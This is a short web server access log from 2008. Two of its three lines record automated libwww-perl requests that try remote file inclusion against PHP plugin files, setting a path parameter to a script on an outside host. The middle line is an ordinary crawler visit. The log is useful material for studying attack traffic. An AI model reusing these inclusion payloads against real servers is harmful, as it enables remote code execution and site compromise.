88.84.132.4 - - [17/Aug/2008:01:56:19 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
67.195.37.153 - - [17/Aug/2008:01:56:32 -0500] "GET /costume/index1.htm HTTP/1.0" 200 21563 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
88.84.132.4 - - [17/Aug/2008:01:56:58 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
